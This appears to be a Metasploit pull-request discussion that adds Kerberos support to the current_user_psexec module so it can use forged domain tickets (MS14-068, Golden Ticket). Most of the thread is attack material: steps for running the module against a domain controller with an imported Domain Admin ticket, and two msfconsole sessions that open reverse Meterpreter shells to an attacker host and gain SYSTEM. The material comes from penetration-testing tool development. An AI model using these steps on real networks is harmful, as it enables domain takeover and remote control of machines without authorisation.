Current User Psexec - Kerberos Support (MS14-068)

[Meatballs1]

Currently after importing a Kerberos token with the kiwi extension, attempts to exploit hosts using the current_user_psexec local exploit module will fail. This is due to the Kerberos requirement to associate with the hostname.

This adds a KERBEROS datastore option which will prevent the hostnames being resolved locally, and instead send the hostnames over the remote host. TBH we probably shouldn't be resolving anything locally for 'local' exploits. This should all be done on the remote host?

20141210-22:17 - 192.168.153.133 exploit(current_user_psexec) > rerun
[*] Reloading module...

[*] [2014.12.10-22:17:22] Started reverse handler on 172.16.80.225:8888 
[*] [2014.12.10-22:17:22] msfdc01          Creating service kWfrGWFDDd
[*] [2014.12.10-22:17:23] msfdc01          Starting the service
[*] [2014.12.10-22:17:24] msfdc01          Deleting the service
[*] [2014.12.10-22:17:26] Sending stage (770048 bytes) to 172.16.80.10
[*] Meterpreter session 5 opened (172.16.80.225:8888 -> 172.16.80.10:63815) at 2014-12-10 22:17:43 +0000

Verification

• Import a Domain Admin Kerberos Ticket (MS14-068/Golden Ticket etc)
• Run module against the Domain Controller using either DNS name or IP address in RHOSTS - will get an access denied error 5
• Apply this PR
• Set KEBEROS TRUE and set the RHOST to the DNS name of the target host.

Fixes

#4348

[jvazquez-r7]

I'll work on it, hopefully today. Tomorrow as late!

About the question TBH we probably shouldn't be resolving anything locally for 'local' exploits. This should all be done on the remote host?. I agree, solving RHOST locally for local exploits can be a hassle. Will check when reviewing what can be done. Thanks @Meatballs1 for the PR!

[jvazquez-r7]

I guess it was trying to avoid DNS resolution when authenticating via Kerberos, but I don't think it solves the issue, because DNS resolution already happens on datastore option validation. Right or am I forgetting something?

[jvazquez-r7]

no matters, after testing, I get the idea here :) yeah, local resolution would waste it when running the module! Tested successfully! Landing!

[jvazquez-r7]

Tested okey:

msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH
msf exploit(current_user_psexec) > set KERBEROS true
KERBEROS => true
msf exploit(current_user_psexec) > set SESSION 1
SESSION => 1
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local
RHOSTS => WIN-F46QAN3U3UH.demo.local
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(current_user_psexec) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(current_user_psexec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] WIN-F46QAN3U3UH.demo.local Creating service DPdDWO7bun
[*] WIN-F46QAN3U3UH.demo.local Starting the service
[*] WIN-F46QAN3U3UH.demo.local Deleting the service
[*] Sending stage (770048 bytes) to 172.16.158.135

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >